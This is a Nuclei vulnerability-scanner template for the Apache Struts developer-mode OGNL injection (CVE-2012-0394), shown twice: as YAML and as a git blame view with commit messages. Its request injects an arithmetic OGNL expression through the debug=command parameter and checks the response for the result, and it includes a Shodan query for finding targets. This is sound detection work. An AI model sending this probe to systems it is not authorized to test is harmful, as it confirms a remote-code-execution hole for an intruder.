nuclei-templates/cves/2012/CVE-2012-0394.yaml

id: CVE-2012-0394

info:
  name: Apache Struts Dev Mode OGNL Injection
  author: tess
  severity: critical
  description: |
    The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
  reference:
    - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
    - https://www.exploit-db.com/exploits/31434
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
  metadata:
    verified: true
    shodan-query: html:"Struts Problem Report"
  tags: cve,cve2012,apache,struts,ognl,injection

variables:
  first: "{{rand_int(1000, 9999)}}"
  second: "{{rand_int(1000, 9999)}}"
  result: "{{to_number(first)*to_number(second)}}"

requests:
  - method: GET
    path:
      - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{result}}'

      - type: status
        status:
          - 200
Update and rename vulnerabilities/backdoor/struts2-ognl-backdoor.yaml to cves/2012/CVE-2012-0394.yaml 2022-11-26 16:06:58 +00:00			`id: CVE-2012-0394`
Create struts-dev-mode-ognl-injection.yaml 2022-11-14 17:41:43 +00:00
			`info:`
			`name: Apache Struts Dev Mode OGNL Injection`
			`author: tess`
			`severity: critical`
Update and rename vulnerabilities/backdoor/struts2-ognl-backdoor.yaml to cves/2012/CVE-2012-0394.yaml 2022-11-26 16:06:58 +00:00			`description: \|`
			`The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."`
Create struts-dev-mode-ognl-injection.yaml 2022-11-14 17:41:43 +00:00			`reference:`
			`- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/`
Update struts-dev-mode-ognl-injection.yaml 2022-11-17 17:47:55 +00:00			`- https://www.exploit-db.com/exploits/31434`
Update and rename vulnerabilities/backdoor/struts2-ognl-backdoor.yaml to cves/2012/CVE-2012-0394.yaml 2022-11-26 16:06:58 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394`
Update struts-dev-mode-ognl-injection.yaml 2022-11-17 17:51:38 +00:00			`metadata:`
			`verified: true`
			`shodan-query: html:"Struts Problem Report"`
Update and rename vulnerabilities/backdoor/struts2-ognl-backdoor.yaml to cves/2012/CVE-2012-0394.yaml 2022-11-26 16:06:58 +00:00			`tags: cve,cve2012,apache,struts,ognl,injection`
Update and rename vulnerabilities/struts-dev-mode-ognl-injection.yaml to vulnerabilities/backdoor/struts2-ognl-backdoor.yaml 2022-11-18 14:03:59 +00:00
			`variables:`
			`first: "{{rand_int(1000, 9999)}}"`
			`second: "{{rand_int(1000, 9999)}}"`
			`result: "{{to_number(first)*to_number(second)}}"`
Create struts-dev-mode-ognl-injection.yaml 2022-11-14 17:41:43 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update and rename vulnerabilities/struts-dev-mode-ognl-injection.yaml to vulnerabilities/backdoor/struts2-ognl-backdoor.yaml 2022-11-18 14:03:59 +00:00			`- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'`
Create struts-dev-mode-ognl-injection.yaml 2022-11-14 17:41:43 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Update and rename vulnerabilities/struts-dev-mode-ognl-injection.yaml to vulnerabilities/backdoor/struts2-ognl-backdoor.yaml 2022-11-18 14:03:59 +00:00			`- '{{result}}'`
Create struts-dev-mode-ognl-injection.yaml 2022-11-14 17:41:43 +00:00
			`- type: status`
			`status:`
			`- 200`